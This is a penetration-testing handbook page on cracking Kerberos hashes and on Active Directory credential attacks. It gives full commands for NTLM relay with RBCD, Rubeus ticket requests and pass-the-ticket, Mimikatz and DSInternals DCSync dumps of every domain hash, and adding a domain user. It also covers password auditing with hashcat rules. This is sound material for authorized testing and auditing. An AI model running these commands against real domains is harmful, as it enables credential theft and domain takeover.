Syslifters Handbook

English

Deutsch

English

Deutsch

Appearance

Hash cracking

Password modes

HashtypeExampleMode
Kerberos RC4$krb5tgs$23$13100
Kerberos AES256$krb5tgs$18$19700

Hashtopolis

When trying to crack kerberoast hashes, separate them into their respective types.

In Hashtopolis:

  1. Create a new hashlist, select the corresponding Kerberos hashtype and paste your hashes
  2. Create a new task, assign your wordlist and delete the appended .??? from the command line arguments
  3. Open the saved task and assign the agent to it

NTLMv1

Only works with NTLMv1 because MIC (Message Integrity Code) can be dropped/omitted in the request. Not applicable to NTLMv2.

Bypass NTLM Message Integrity Check - Drop the MIC

Example attack chain (high-level):

  1. Coerce authentication to a notebook you control, then relay it between systems (e.g., DC1 to DC2).
  2. Configure resource-based constrained delegation (RBCD) for your controlled notebook.
  3. Request a service ticket for LDAP via Rubeus (.\Rubeus.exe s4u /impersonateUser:admin /msdsspn:ldap/DC.example.local /rc4:<HASH> /user:<controlled-nb-name> /ptt /nowrap).
  4. Start Mimikatz and use DCSync to retrieve a DA password hash (lsadump::dcsync /user:admin /domain:example.local).
  5. Optionally dump all users: lsadump::dcsync /all /domain:lab.local /csv
  6. Request a Kerberos TGT via Rubeus asktgt (.\Rubeus.exe asktgt /user:admin /rc4:<RC4-Hash>).
  7. Perform actions (e.g. net user /add USERNAME PASSWORD /domain) using the issued TGT.

DC Sync

powershell
powershell -ep bypass -c ". Import-Module DSInternals; Get-ADReplAccount -All -Server dc1.example.local" > accounts.txt

Store DCSync in variable

powershell
$accounts = Get-ADReplAccount -all -server <dc-ip> -Credential (Get-Credential)

Mimikatz for password cracking

powershell
.\mimikatz.exe \"lsadump::dcsync /all /csv\" > accounts-csv.txt

DSInternals

Setup

powershell
Install-Module -Name DSInternals -Force
Import-Module -Name DSInternals

Test-PasswordQuality

powershell
$accounts = Get-ADReplAccount -all -server <dc-ip> -Credential (Get-Credential)
$accounts | Test-PasswordQuality > testPwdQuality.txt

HIBP database

Download password hashes from haveibeenpwned.com:

https://github.com/HaveIBeenPwned/PwnedPasswordsDownloader

powershell
$accounts | Test-PasswordQuality -WeakPasswordHashesFile \"C:\\temp\\pwnedpasswords_ntlm.txt\"
Passwords of these accounts have been found in the dictionary:

Leaked-password corpus with ruleset

Use a leaked-password corpus you are licensed/allowed to use and apply rules like "OneRuleToRuleThemStill" (https://github.com/stealthsploit/OneRuleToRuleThemStill).

Use Hashcat to create a list of passwords with the ruleset:

powershell
hashcat --force sysleaks-dict.txt -r ./OneRuleToRuleThemStill.rule --stdout > leaks-with-rules.txt

Use with DSInternals to check for passwords from the list:

powershell
$accounts | Test-PasswordQuality -WeakPasswordsFile \"C:\\temp\\pwnedpasswords-with-ruleset.txt\"